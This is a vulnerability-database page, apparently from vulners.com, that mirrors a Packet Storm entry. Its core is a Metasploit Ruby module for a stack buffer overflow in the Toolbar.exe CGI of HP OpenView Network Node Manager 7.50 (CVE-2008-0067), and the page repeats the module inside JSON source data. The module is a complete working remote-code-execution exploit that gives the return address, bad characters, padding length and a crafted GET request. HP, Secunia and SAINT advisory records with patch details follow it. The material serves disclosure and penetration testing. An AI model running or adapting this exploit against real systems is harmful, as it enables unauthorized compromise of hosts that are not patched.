Search...

HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow

2011-07-16T00:00:00

ID PACKETSTORM:103112
Type packetstorm
Reporter MC
Modified 2011-07-16T00:00:00

Description

                                        
                                            `##  
# $Id: hp_nnm_toolbar_01.rb 13192 2011-07-16 04:45:21Z sinn3r $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 &lt; Msf::Exploit::Remote  
Rank = GreatRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' =&gt; 'HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow',  
'Description' =&gt; %q{  
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.  
By sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute  
arbitrary code.  
},  
'Author' =&gt; [ 'MC' ],  
'License' =&gt; MSF_LICENSE,  
'Version' =&gt; '$Revision: 13192 $',  
'References' =&gt;  
[  
[ 'CVE', '2008-0067' ],  
[ 'OSVDB', '53222' ],  
[ 'BID', '33147' ],  
],  
'DefaultOptions' =&gt;  
{  
'EXITFUNC' =&gt; 'process',  
},  
'Privileged' =&gt; false,  
'Payload' =&gt;  
{  
'Space' =&gt; 650,  
'BadChars' =&gt; "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",  
'StackAdjustment' =&gt; -3500,  
},  
'Platform' =&gt; 'win',  
'Targets' =&gt;  
[  
[ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' =&gt; 0x5a01d78d } ], # ov.dll  
],  
'DefaultTarget' =&gt; 0,  
'DisclosureDate' =&gt; 'Jan 7 2009'))  
  
register_options( [ Opt::RPORT(80) ], self.class )  
end  
  
def exploit  
  
sploit = rand_text_alpha_upper(5108) + [target.ret].pack('V') + payload.encoded  
  
print_status("Trying target #{target.name}...")  
  
send_request_raw({  
'uri' =&gt; "/OvCgi/Toolbar.exe?" + sploit,  
'method' =&gt; "GET",  
}, 5)  
  
  
handler  
  
end  
  
end  
`

JSON Vulners Source

Initial Source

{"sourceHref": "https://packetstormsecurity.com/files/download/103112/hp_nnm_toolbar_01.rb.txt", "sourceData": "`## \n# $Id: hp_nnm_toolbar_01.rb 13192 2011-07-16 04:45:21Z sinn3r $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. \nBy sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute \narbitrary code. \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 13192 $', \n'References' => \n[ \n[ 'CVE', '2008-0067' ], \n[ 'OSVDB', '53222' ], \n[ 'BID', '33147' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Privileged' => false, \n'Payload' => \n{ \n'Space' => 650, \n'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' => 0x5a01d78d } ], # ov.dll \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Jan 7 2009')) \n \nregister_options( [ Opt::RPORT(80) ], self.class ) \nend \n \ndef exploit \n \nsploit = rand_text_alpha_upper(5108) + [target.ret].pack('V') + payload.encoded \n \nprint_status(\"Trying target #{target.name}...\") \n \nsend_request_raw({ \n'uri' => \"/OvCgi/Toolbar.exe?\" + sploit, \n'method' => \"GET\", \n}, 5) \n \n \nhandler \n \nend \n \nend \n`\n", "edition": 1, "references": [], "modified": "2011-07-16T00:00:00", "hash": "3eaea95b61b39bbb0e520cb77de6fb8b5eceaa0bb758252e23d99b982dbbfcb7", "bulletinFamily": "exploit", "history": [], "cvelist": ["CVE-2008-0067"], "href": "https://packetstormsecurity.com/files/103112/HP-OpenView-Network-Node-Manager-Toolbar.exe-CGI-Buffer-Overflow.html", "description": "", "id": "PACKETSTORM:103112", "reporter": "MC", "lastseen": "2016-12-05T22:22:58", "published": "2011-07-16T00:00:00", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.2", "type": "packetstorm", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 10.0}, "title": "HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "406b89207a8819f5e65d25d75c0c553a", "key": "cvelist"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "475d2913744923e97afbf6ae4bfa51d8", "key": "href"}, {"hash": "93135c486d720efff40a265086929c9c", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "93135c486d720efff40a265086929c9c", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "92a54b358b4cf53cca4095e4697e1004", "key": "reporter"}, {"hash": "b43eab32c3d111ff1e7bdb674bd80460", "key": "sourceData"}, {"hash": "72c2bc5235627d4a30e2b4c879a20552", "key": "sourceHref"}, {"hash": "11b58e4610533ef5028a945362582645", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}]}

{"cve": [{"lastseen": "2018-10-16T10:52:02", "references": ["http://securityreason.com/securityalert/8307", "http://www.securityfocus.com/archive/1/499826/100/0/threaded", "http://www.securityfocus.com/bid/33147", "http://securityreason.com/securityalert/4885", "http://securitytracker.com/id?1021521", "http://marc.info/?l=bugtraq&m=123247393715913&w=2"], "description": "Multiple stack-based buffer overflows in HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53 allow remote attackers to execute arbitrary code via (1) long string parameters to the OpenView5.exe CGI program; (2) a long string parameter to the OpenView5.exe CGI program, related to ov.dll; or a long string parameter to the (3) getcvdata.exe, (4) ovlaunch.exe, or (5) Toolbar.exe CGI program.", "edition": 2, "reporter": "NVD", "published": "2009-01-08T14:30:00", "title": "CVE-2008-0067", "type": "cve", "enchantments": {"score": {"modified": "2018-10-16T10:52:02", "vector": "NONE", "value": 9.3}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2008-0067"], "scanner": [], "modified": "2018-10-15T17:57:30", "cpe": ["cpe:/a:hp:openview_network_node_manager:7.51"], "id": "CVE-2008-0067", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0067", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:29", "references": [], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c01646081\r\nVersion: 1\r\n\r\nHPSBMA02400 SSRT080144 rev.1 - HP OpenView Network Node Manager (OV NNM), Remote Execution of\r\nArbitrary Code\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2009-01-20\r\nLast Updated: 2009-01-20\r\n\r\nPotential Security Impact: Remote execution of arbitrary code\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV\r\nNNM). These vulnerabilities could be exploited remotely to allow execution of arbitrary code.\r\n\r\nReferences: CVE-2008-0067\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP OpenView Network Node Manager (OV NNM) v7.01, v7.51, v7.53 running on HP-UX, Linux, Solaris, and\r\nWindows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics \r\n===============================================\r\nReference Base Vector Base Score \r\nCVE-2008-0067 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\r\n===============================================\r\nInformation on CVSS is documented in HP Customer Notice: HPSN-2008-002.\r\n\r\nThe Hewlett-Packard Company thanks JJ Reyes, Secunia Research for reporting this vulnerability to\r\nsecurity-alert@hp.com.\r\n\r\nRESOLUTION\r\n\r\nHP has made patches available to resolve the vulnerabilities.\r\n\r\nThe patches are available from http://support.openview.hp.com/selfsolve/patches \r\n\r\nNote: The patches are not available from the HP IT Resource Center (ITRC). \r\n\r\nOV NNM v7.53 \r\n \r\nOperating_System - HP-UX (IA)\r\nResolved in Patch - PHSS_38489 or subsequent\r\n \r\nOperating_System - HP-UX (PA)\r\nResolved in Patch - PHSS_38488 or subsequent\r\n \r\nOperating_System - Linux RedHatAS2.1 \r\nResolved in Patch - LXOV_00087 or subsequent\r\n \r\nOperating_System - Linux RedHat4AS-x86_64 \r\nResolved in Patch - LXOV_00088 or subsequent\r\n \r\nOperating_System - Solaris\r\nResolved in Patch - PSOV_03515 or subsequent\r\n \r\nOperating_System - Windows\r\nResolved in Patch - NNM_01193 or subsequent\r\n \r\n\r\n\r\nOV NNM v7.51 \r\n\r\nUpgrade to NNM v7.53 and install the patches listed above. \r\nPatch bundles for upgrading from NNM v7.51 to NNM v5.53 are available here:\r\nftp://nnm_753:update@hprc.external.hp.com/ \r\n\r\n\r\nOV NNM v7.01 \r\n \r\nOperating_System - HP-UX (PA)\r\nResolved in Patch - PHSS_38761 or subsequent\r\n \r\nOperating_System - Solaris\r\nResolved in Patch - PSOV_03516 or subsequent\r\n \r\nOperating_System - Windows\r\nResolved in Patch - NNM_01194 or subsequent\r\n \r\n\r\n\r\nMANUAL ACTIONS: Yes - NonUpdate \r\nInstall the patches listed in the Resolution \r\n\r\nPRODUCT SPECIFIC INFORMATION \r\n\r\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX\r\nSecurity Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions\r\nthat may apply to a specific HP-UX system. It can also download patches and create a depot\r\nautomatically. For more information see https://www.hp.com/go/swa \r\n\r\nThe following text is for use by the HP-UX Software Assistant.\r\n\r\nAFFECTED VERSIONS (for HP-UX)\r\n\r\nFor HP-UX OV NNM 7.51 and 7.53 \r\nHP-UX B.11.31 \r\nHP-UX B.11.23 (IA) \r\nHP-UX B.11.23 (PA) \r\nHP-UX B.11.11 \r\n============= \r\nOVNNMgr.OVNNM-RUN,fr=B.07.50.00 \r\naction: install the patches listed in the Resolution \r\nURL: http://support.openview.hp.com/selfsolve/patches \r\n\r\nFor HP-UX OV NNM 7.01 \r\nHP-UX B.11.11 \r\n============= \r\nOVNNMgr.OVNNM-RUN,fr=B.07.01.00 \r\naction: install the patches listed in the Resolution \r\nURL: http://support.openview.hp.com/selfsolve/patches \r\n\r\nEND AFFECTED VERSIONS (for HP-UX)\r\n\r\nHISTORY \r\nVersion:1 (rev.1) - 20 January 2009 Initial release \r\n\r\nThird Party Security Patches: Third party security patches that are to be installed on systems\r\nrunning HP software products should be applied in accordance with the customer's patch management\r\npolicy. \r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email to:\r\nsecurity-alert@hp.com \r\nIt is strongly recommended that security related information being communicated to HP be encrypted\r\nusing PGP, especially exploit information. \r\nTo get the security-alert PGP key, please send an e-mail message as follows:\r\n To: security-alert@hp.com \r\n Subject: get key\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email: \r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC\r\nOn the web page: ITRC security bulletins and patch sign-up \r\nUnder Step1: your ITRC security bulletins and patches \r\n - check ALL categories for which alerts are required and continue.\r\nUnder Step2: your ITRC operating systems \r\n - verify your operating system selections are checked and save.\r\n\r\n\r\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php \r\nLog in on the web page: Subscriber's choice for Business: sign-in. \r\nOn the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate\r\nsections.\r\n\r\n\r\nTo review previously published Security Bulletins visit:\r\nhttp://www.itrc.hp.com/service/cki/secBullArchive.do \r\n\r\n\r\n* The Software Product Category that this Security Bulletin relates to is represented by the 5th\r\nand 6th characters of the Bulletin number in the title: \r\n\r\nGN = HP General SW\r\nMA = HP Management Agents\r\nMI = Misc. 3rd Party SW\r\nMP = HP MPE/iX\r\nNS = HP NonStop Servers\r\nOV = HP OpenVMS\r\nPI = HP Printing & Imaging\r\nST = HP Storage SW\r\nTL = HP Trusted Linux\r\nTU = HP Tru64 UNIX\r\nUX = HP-UX\r\nVV = HP VirtualVault\r\n \r\nSystem management and security procedures must be reviewed frequently to maintain system integrity.\r\nHP is continually reviewing and enhancing the security features of software products to provide\r\ncustomers with current secure solutions.\r\n\r\n\r\n"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of\r\nthe affected HP products the important security information contained in this Bulletin. HP\r\nrecommends that all users determine the applicability of this information to their individual\r\nsituations and take appropriate action. HP does not warrant that this information is necessarily\r\naccurate or complete for all user situations and, consequently, HP will not be responsible for any\r\ndamages resulting from user's use or disregard of the information provided in this Bulletin. To the\r\nextent permitted by law, HP disclaims all warranties, either express or implied, including the\r\nwarranties of merchantability and fitness for a particular purpose, title and non-infringement."\r\n\r\n\u00a9Copyright 2009 Hewlett-Packard Development Company, L.P. \r\n\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions\r\ncontained herein. The information provided is provided "as is" without warranty of any kind. To the\r\nextent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable\r\nfor incidental, special or consequential damages including downtime cost; lost profits; damages\r\nrelating to the procurement of substitute products or services; or damages for loss of data, or\r\nsoftware restoration. The information in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks\r\nof Hewlett-Packard Company in the United States and other countries. Other product and company names\r\nmentioned herein may be trademarks of their respective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP 8.1\r\n\r\niQA/AwUBSXXb4eAfOvwtKn1ZEQIG3QCeNut0nSLFg1VipnZBq4n/gyZl4pAAoKQ+\r\nHft2wH0X3WL9UQLzdH68qh/h\r\n=i+3+\r\n-----END PGP SIGNATURE-----", "edition": 1, "reporter": "Securityvulns", "published": "2009-01-20T00:00:00", "title": "[security bulletin] HPSBMA02400 SSRT080144 rev.1 - HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:29", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2008-0067"], "modified": "2009-01-20T00:00:00", "id": "SECURITYVULNS:DOC:21209", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21209", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:28", "references": [], "description": "====================================================================== \r\n\r\n Secunia Research 07/01/2009\r\n\r\n - HP OpenView Network Node Manager Multiple Vulnerabilities -\r\n\r\n====================================================================== \r\nTable of Contents\r\n\r\nAffected Software....................................................1\r\nSeverity.............................................................2\r\nVendor's Description of Software.....................................3\r\nDescription of Vulnerability.........................................4\r\nSolution.............................................................5\r\nTime Table...........................................................6\r\nCredits..............................................................7\r\nReferences...........................................................8\r\nAbout Secunia........................................................9\r\nVerification........................................................10\r\n\r\n====================================================================== \r\n1) Affected Software \r\n\r\n* HP OpenView Network Node Manager 7.51 with NNM_01168.\r\n\r\nNOTE: Other versions may also be affected.\r\n\r\n====================================================================== \r\n2) Severity \r\n\r\nRating: Moderately critical\r\nImpact: System Access\r\nWhere: Local network\r\n\r\n====================================================================== \r\n3) Vendor's Description of Software \r\n\r\n"This software provides a vast amount of automation, including event\r\ncorrelation and automated monitoring of your network to improve the \r\nefficiency and productivity of your IT staff."\r\n\r\nProduct Link:\r\nhttp://www.openview.hp.com/products/nnm/\r\n\r\n====================================================================== \r\n4) Description of Vulnerability\r\n\r\nSecunia Research has discovered vulnerabilities in HP OpenView Network\r\nNode Manager, which can be exploited by malicious people to compromise\r\na vulnerable system.\r\n\r\n1) Various boundary errors in the OpenView5.exe CGI application when\r\nprocessing parameters can be exploited to cause stack-based buffer \r\noverflows via HTTP requests to the CGI application with overly long \r\nparameter strings.\r\n\r\n2) A boundary error in ov.dll can be exploited to cause a stack-based\r\nbuffer overflow by e.g. sending a HTTP request to the OpenView5.exe \r\nCGI application with an overly long parameter string.\r\n\r\n3) A boundary error in the getcvdata.exe CGI application can be \r\nexploited to cause a stack-based buffer overflow by sending a HTTP \r\nrequest to the CGI application with an overly long parameter string.\r\n\r\n4) A boundary error in the ovlaunch.exe CGI application can be \r\nexploited to cause a stack-based buffer overflow by sending a HTTP \r\nrequest to the CGI application with an overly long parameter string.\r\n\r\n5) A boundary error in the Toolbar.exe CGI application can be \r\nexploited to cause a stack-based buffer overflow by sending a HTTP \r\nrequest to the CGI application with an overly long parameter string.\r\n\r\n6) A boundary error in the Toolbar.exe CGI application can be \r\nexploited to cause a stack-based buffer overflow by sending a HTTP \r\nrequest to the CGI application with an overly long parameter string.\r\n\r\nSuccessful exploitation of the vulnerabilities allows execution of \r\narbitrary code.\r\n\r\n====================================================================== \r\n5) Solution \r\n\r\nRestrict access to the affected CGI applications.\r\n\r\nThe vendor is reportedly working on fixes.\r\n\r\n====================================================================== \r\n6) Time Table \r\n\r\n07/01/2008 - Vendor notified.\r\n07/01/2008 - Vendor response.\r\n24/01/2008 - Status update requested.\r\n24/01/2008 - Vendor response (division has been asked for an update).\r\n20/02/2008 - Status update requested.\r\n20/02/2008 - Vendor response (division has been asked for an update\r\n and claims that the product is unaffected by some of the \r\n reported vulnerabilities).\r\n20/02/2008 - Vendor informed that latest version (7.51 with NNM_01168)\r\n is confirmed to be vulnerable.\r\n20/02/2008 - Vendor response (additional information has been passed\r\n along to the division).\r\n27/02/2008 - Vendor provides status update and acknowledges the \r\n reported vulnerabilities.\r\n28/02/2008 - Additional information about two vulnerabilities provided\r\n to the vendor.\r\n27/05/2008 - Status update requested.\r\n27/05/2008 - Vendor response (division has been asked for an update).\r\n07/11/2008 - Status update requested.\r\n07/11/2008 - Vendor response (original SSRT has been split into three \r\n SSRTs and division has been asked for an update).\r\n07/01/2009 - Public disclosure.\r\n\r\n====================================================================== \r\n7) Credits \r\n\r\nDiscovered by JJ Reyes, Secunia Research.\r\n\r\n====================================================================== \r\n8) References\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned \r\nCVE-2008-0067 for the vulnerabilities.\r\n\r\n====================================================================== \r\n9) About Secunia\r\n\r\nSecunia offers vulnerability management solutions to corporate\r\ncustomers with verified and reliable vulnerability intelligence\r\nrelevant to their specific system configuration:\r\n\r\nhttp://secunia.com/advisories/business_solutions/\r\n\r\nSecunia also provides a publicly accessible and comprehensive advisory\r\ndatabase as a service to the security community and private \r\nindividuals, who are interested in or concerned about IT-security.\r\n\r\nhttp://secunia.com/advisories/\r\n\r\nSecunia believes that it is important to support the community and to\r\ndo active vulnerability research in order to aid improving the \r\nsecurity and reliability of software in general:\r\n\r\nhttp://secunia.com/secunia_research/\r\n\r\nSecunia regularly hires new skilled team members. Check the URL below\r\nto see currently vacant positions:\r\n\r\nhttp://secunia.com/corporate/jobs/\r\n\r\nSecunia offers a FREE mailing list called Secunia Security Advisories:\r\n\r\nhttp://secunia.com/advisories/mailing_lists/\r\n\r\n====================================================================== \r\n10) Verification \r\n\r\nPlease verify this advisory by visiting the Secunia website:\r\nhttp://secunia.com/secunia_research/2008-13/\r\n\r\nComplete list of vulnerability reports published by Secunia Research:\r\nhttp://secunia.com/secunia_research/\r\n\r\n======================================================================", "edition": 1, "reporter": "Securityvulns", "published": "2009-01-10T00:00:00", "title": "Secunia Research: HP OpenView Network Node Manager Multiple Vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:28", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2008-0067"], "modified": "2009-01-10T00:00:00", "id": "SECURITYVULNS:DOC:21118", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21118", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:31", "references": ["https://vulners.com/securityvulns/securityvulns:doc:21312", "https://vulners.com/securityvulns/securityvulns:doc:21209", "https://vulners.com/securityvulns/securityvulns:doc:21313", "https://vulners.com/securityvulns/securityvulns:doc:21118", "https://vulners.com/securityvulns/securityvulns:doc:21318"], "description": "Multiple vulnerabilities in CGI interface.", "edition": 1, "reporter": "BUGTRAQ", "published": "2009-02-07T00:00:00", "title": "HP OpenView Network Node Manager multiple security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:31", "vector": "NONE", "value": 10.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "OpenView Network Node Manager", "version": "7.51", "operator": "eq"}], "cvelist": ["CVE-2008-4559", "CVE-2008-4562", "CVE-2008-0067", "CVE-2008-4560"], "modified": "2009-02-07T00:00:00", "id": "SECURITYVULNS:VULN:9567", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9567", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2016-10-03T15:02:00", "references": [], "description": "Added: 03/23/2009 \nCVE: [CVE-2008-0067](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0067>) \nBID: [33147](<http://www.securityfocus.com/bid/33147>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA buffer overflow vulnerability in the `**OpenView5.exe**` CGI program allows remote attackers to execute arbitrary commands. \n\n### Resolution\n\nApply one of the patches referenced in [HPSBMA02400 SSRT080144](<http://www.securityfocus.com/archive/1/500203>). \n\n### References\n\n<http://secunia.com/secunia_research/2008-13/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.53 on Windows 2000. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "reporter": "SAINT Corporation", "published": "2009-03-23T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "saint", "title": "HP OpenView Network Node Manager OpenView5.exe buffer overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0067"], "modified": "2009-03-23T00:00:00", "id": "SAINT:0D54CC4C7F1DA98A4E8EE9297A724B3A", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_openview5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-10-03T15:01:58", "references": [], "description": "Added: 01/14/2009 \nCVE: [CVE-2008-0067](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0067>) \nBID: [33147](<http://www.securityfocus.com/bid/33147>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA buffer overflow vulnerability allows remote attackers to execute arbitrary commands by sending an HTTP request for the `**getcvdata.exe**` CGI program with a long, specially crafted parameter string. \n\n### Resolution\n\nRestrict access to the `**getcvdata.exe**` CGI program. Apply a fix when available. \n\n### References\n\n<http://secunia.com/secunia_research/2008-13/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.53. \n\n### Platforms\n\nWindows 2000 \n \n\n", "edition": 1, "reporter": "SAINT Corporation", "published": "2009-01-14T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "saint", "title": "HP OpenView Network Node Manager getcvdata.exe parameter string buffer overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0067"], "modified": "2009-01-14T00:00:00", "id": "SAINT:C9915F1810973BB36B625CD8469D6491", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_getcvdata", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:15", "references": [], "description": "Added: 01/14/2009 \nCVE: [CVE-2008-0067](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0067>) \nBID: [33147](<http://www.securityfocus.com/bid/33147>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA buffer overflow vulnerability allows remote attackers to execute arbitrary commands by sending an HTTP request for the `**getcvdata.exe**` CGI program with a long, specially crafted parameter string. \n\n### Resolution\n\nRestrict access to the `**getcvdata.exe**` CGI program. Apply a fix when available. \n\n### References\n\n<http://secunia.com/secunia_research/2008-13/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.53. \n\n### Platforms\n\nWindows 2000 \n \n\n", "edition": 3, "reporter": "SAINT Corporation", "published": "2009-01-14T00:00:00", "title": "HP OpenView Network Node Manager getcvdata.exe parameter string buffer overflow", "type": "saint", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0067"], "modified": "2009-01-14T00:00:00", "id": "SAINT:C597FB3A23C41837AF019180ED4384E3", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_getcvdata", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-14T16:58:05", "references": [], "edition": 1, "description": "Added: 03/23/2009 \nCVE: [CVE-2008-0067](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0067>) \nBID: [33147](<http://www.securityfocus.com/bid/33147>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA buffer overflow vulnerability in the `**OpenView5.exe**` CGI program allows remote attackers to execute arbitrary commands. \n\n### Resolution\n\nApply one of the patches referenced in [HPSBMA02400 SSRT080144](<http://www.securityfocus.com/archive/1/500203>). \n\n### References\n\n<http://secunia.com/secunia_research/2008-13/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.53 on Windows 2000. \n\n### Platforms\n\nWindows \n \n\n", "reporter": "SAINT Corporation", "published": "2009-03-23T00:00:00", "type": "saint", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "HP OpenView Network Node Manager OpenView5.exe buffer overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0067"], "modified": "2009-03-23T00:00:00", "id": "SAINT:EB5CC2178A48D85450DEA40F8E9B5362", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_openview5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-14T16:58:04", "references": [], "edition": 1, "description": "Added: 01/09/2009 \nCVE: [CVE-2008-0067](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0067>) \nBID: [33147](<http://www.securityfocus.com/bid/33147>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA buffer overflow vulnerability allows remote attackers to execute arbitrary commands by requesting the `**Toolbar.exe**` CGI program with a long, specially crafted parameter. \n\n### Resolution\n\nApply a fix when available, or restrict access to the `**Toolbar.exe**` CGI program. \n\n### References\n\n<http://secunia.com/secunia_research/2008-13/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.5 on Windows 2000. \n\n### Platforms\n\nWindows \n \n\n", "reporter": "SAINT Corporation", "published": "2009-01-09T00:00:00", "type": "saint", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "HP OpenView Network Node Manager Toolbar.exe CGI buffer overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0067"], "modified": "2009-01-09T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_toolbar", "id": "SAINT:8DC4A670199A534D615433A9469A9871", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-10-03T15:02:00", "references": [], "description": "Added: 01/09/2009 \nCVE: 